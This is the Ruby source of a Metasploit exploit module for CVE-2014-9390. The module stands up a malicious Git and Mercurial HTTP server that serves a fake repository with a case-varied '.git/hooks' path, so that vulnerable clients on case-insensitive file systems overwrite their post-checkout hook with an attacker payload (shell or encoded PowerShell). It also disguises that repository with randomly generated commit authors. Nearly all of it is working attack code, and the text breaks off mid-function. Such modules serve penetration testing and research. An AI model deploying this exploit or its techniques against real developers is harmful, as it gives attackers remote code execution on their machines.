## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Powershell def initialize(info = {}) super(update_info( info, 'Name' => 'Malicious Git and Mercurial HTTP Server For CVE-2014-9390', 'Description' => %q( This module exploits CVE-2014-9390, which affects Git (versions less than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions less than 3.2.3) and describes three vulnerabilities. On operating systems which have case-insensitive file systems, like Windows and OS X, Git clients can be convinced to retrieve and overwrite sensitive configuration files in the .git directory which can allow arbitrary code execution if a vulnerable client can be convinced to perform certain actions (for example, a checkout) against a malicious Git repository. A second vulnerability with similar characteristics also exists in both Git and Mercurial clients, on HFS+ file systems (Mac OS X) only, where certain Unicode codepoints are ignorable. The third vulnerability with similar characteristics only affects Mercurial clients on Windows, where Windows "short names" (MS-DOS-compatible 8.3 format) are supported. Today this module only truly supports the first vulnerability (Git clients on case-insensitive file systems) but has the functionality to support the remaining two with a little work. ), 'License' => MSF_LICENSE, 'Author' => [ 'Jon Hart ' # metasploit module ], 'References' => [ ['CVE', '2014-9390'], ['URL', 'https://community.rapid7.com/community/metasploit/blog/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial'], ['URL', 'http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html'], ['URL', 'http://article.gmane.org/gmane.linux.kernel/1853266'], ['URL', 'https://github.com/blog/1938-vulnerability-announced-update-your-git-clients'], ['URL', 'https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/'], ['URL', 'http://mercurial.selenic.com/wiki/WhatsNew#Mercurial_3.2.3_.282014-12-18.29'], ['URL', 'http://selenic.com/repo/hg-stable/rev/c02a05cc6f5e'], ['URL', 'http://selenic.com/repo/hg-stable/rev/6dad422ecc5a'] ], 'DisclosureDate' => 'Dec 18 2014', 'Targets' => [ [ 'Automatic', { 'Platform' => [ 'unix' ], 'Arch' => ARCH_CMD, 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd cmd_bash', 'RequiredCmd' => 'generic bash-tcp perl bash' } } } ], [ 'Windows Powershell', { 'Platform' => [ 'windows' ], 'Arch' => [ARCH_X86, ARCH_X86_64] } ] ], 'DefaultTarget' => 0)) register_options( [ OptBool.new('GIT', [true, 'Exploit Git clients', true]) ] ) register_advanced_options( [ OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']), OptString.new('MERCURIAL_URI', [false, 'The URI to use as the malicious Mercurial instance (empty for random)', '']), OptString.new('GIT_HOOK', [false, 'The Git hook to use for exploitation', 'post-checkout']), OptString.new('MERCURIAL_HOOK', [false, 'The Mercurial hook to use for exploitation', 'update']), OptBool.new('MERCURIAL', [false, 'Enable experimental Mercurial support', false]) ] ) end def setup # the exploit requires that we act enough like a real Mercurial HTTP instance, # so we keep a mapping of all of the files and the corresponding data we'll # send back along with a trigger file that signifies that the git/mercurial # client has fetched the malicious content. @repo_data = { git: { files: {}, trigger: nil }, mercurial: { files: {}, trigger: nil } } unless datastore['GIT'] || datastore['MERCURIAL'] fail_with(Exploit::Failure::BadConfig, 'Must specify at least one GIT and/or MERCURIAL') end setup_git setup_mercurial super end def setup_git return unless datastore['GIT'] # URI must start with a / unless git_uri && git_uri =~ /^\// fail_with(Exploit::Failure::BadConfig, 'GIT_URI must start with a /') end # sanity check the malicious hook: if datastore['GIT_HOOK'].blank? fail_with(Exploit::Failure::BadConfig, 'GIT_HOOK must not be blank') end # In .git/hooks/ directory, specially named files are shell scripts that # are executed when particular events occur. For example, if # .git/hooks/post-checkout was an executable shell script, a git client # would execute that file every time anything is checked out. There are # various other files that can be used to achieve similar goals but related # to committing, updating, etc. # # This vulnerability allows a specially crafted file to bypass Git's # blacklist and overwrite the sensitive .git/hooks/ files which can allow # arbitrary code execution if a vulnerable Git client can be convinced to # interact with a malicious Git repository. # # This builds a fake git repository using the knowledge from: # # http://schacon.github.io/gitbook/7_how_git_stores_objects.html # http://schacon.github.io/gitbook/7_browsing_git_objects.html case target.name when 'Automatic' full_cmd = "#!/bin/sh\n#{payload.encoded}\n" when 'Windows Powershell' psh = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, encode_final_payload: true) full_cmd = "#!/bin/sh\n#{psh}" end sha1, content = build_object('blob', full_cmd) trigger = "/objects/#{get_path(sha1)}" @repo_data[:git][:trigger] = trigger @repo_data[:git][:files][trigger] = content # build tree that points to the blob sha1, content = build_object('tree', "100755 #{datastore['GIT_HOOK']}\0#{[sha1].pack('H*')}") @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content # build a tree that points to the hooks directory in which the hook lives, called hooks sha1, content = build_object('tree', "40000 hooks\0#{[sha1].pack('H*')}") @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content # build a tree that points to the partially uppercased .git directory in # which hooks live variants = [] %w(g G). each do |g| %w(i I).each do |i| %w(t T).each do |t| git = g + i + t variants << git unless git.chars.none? { |c| c == c.upcase } end end end git_dir = '.' + variants.sample sha1, content = build_object('tree', "40000 #{git_dir}\0#{[sha1].pack('H*')}") @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content # build the supposed commit that dropped this file, which has a random user/company email = Rex::Text.rand_mail_address first, last, company = email.scan(/([^\.]+)\.([^\.]+)@(.*)$/).flatten full_name = "#{first.capitalize} #{last.capitalize}" tstamp = Time.now.to_i author_time = rand(tstamp) commit_time = rand(author_time) tz_off = rand(10) commit = "author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\n" \ "committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\n" \ "\n" \ "Initial commit to open git repository for #{company}!\n" if datastore['VERBOSE'] vprint_status("Malicious Git commit of #{git_dir}/#{datastore['GIT_HOOK']} is:") commit.each_line { |l| vprint_status(l.strip) } end sha1, content = build_object('commit', "tree #{sha1}\n#{commit}") @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content # build HEAD @repo_data[:git][:files]['/HEAD'] = "ref: refs/heads/master\n" # lastly, build refs @repo_data[:git][:files]['/info/refs'] = "#{sha1}\trefs/heads/master\n" end def setup_mercurial return unless datastore['MERCURIAL'] # URI must start with a / unless mercurial_uri && mercurial_uri =~ /^\// fail_with(Exploit::Failure::BadConfig, 'MERCURIAL_URI must start with a /') end # sanity check the malicious hook if datastore['MERCURIAL_HOOK'].blank? fail_with(Exploit::Failure::BadConfig, 'MERCURIAL_HOOK must not be blank') end # we fake the Mercurial HTTP protocol such that we are compliant as possible but # also as simple as possible so that we don't have to support all of the protocol # complexities. Taken from: # http://mercurial.selenic.com/wiki/HttpCommandProtocol # http://selenic.com/hg/file/tip/mercurial/wireproto.py @repo_data[:mercurial][:files]['?cmd=capabilities'] = 'heads getbundle=HG10UN' fake_sha1 = 'e6c39c507d7079cfff4963a01ea3a195b855d814' @repo_data[:mercurial][:files]['?cmd=heads'] = "#{fake_sha1}\n" # TODO: properly bundle this using the information in http://mercurial.selenic.com/wiki/BundleFormat @repo_data[:mercurial][:files]["?cmd=getbundle&common=#{'0' * 40}&heads=#{fake_sha1}"] = Zlib::Deflate.deflate("HG10UNfoofoofoo") # TODO: finish building the fake repository end # Build's a Git object def build_object(type, content) # taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html header = "#{type} #{content.size}\0" store = header + content [Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)] end # Returns the Git object path name that a file with the provided SHA1 will reside in def get_path(sha1) sha1[0...2] + '/' + sha1[2..40] end def exploit super end def primer # add the git and mercurial URIs as necessary if datastore['GIT'] hardcoded_uripath(git_uri) print_status("Malicious Git URI is #{URI.parse(get_uri).merge(git_uri)}") end if datastore['MERCURIAL'] hardcoded_uripath(mercurial_uri) print_status("Malicious Mercurial URI is #{URI.parse(get_uri).merge(mercurial_uri)}") end end # handles routing any request to the mock git, mercurial or simple HTML as necessary def on_request_uri(cli, req) # if the URI is one of our repositories and the user-agent is that of git/mercurial # send back the appropriate data, otherwise just show the HTML version if (user_agent = req.headers['User-Agent']) if datastore['GIT'] && user_agent =~ /^git\// && req.uri.start_with?(git_uri) do_git(cli, req) return elsif datastore['MERCURIAL'] && user_agent =~ /^mercurial\// && req.uri.start_with?(mercurial_uri) do_mercurial(cli, req) return end end do_html(cli, req) end # simulates a Git HTTP server def do_git(cli, req) # determine if the requested file is something we know how to serve from our # fake repository and send it if so req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '') if @repo_data[:git][:files].key?(req_file) vprint_status("Sending Git #{req_file}") send_response(cli, @repo_data[:git][:files][req_file]) if req_file == @repo_data[:git][:trigger] vprint_status("Trigger!") # Do we need this? If so, how can I update the payload which is in a file which # has already been built? # regenerate_payload handler(cli) end else vprint_status("Git #{req_file} doesn't exist") send_not_found(cli) end end # simulates an HTTP server with simple HTML content that lists the fake # repositories available for cloning def do_html(cli, _req) resp = create_response resp.body = < Public Repositories

Here are our public repositories: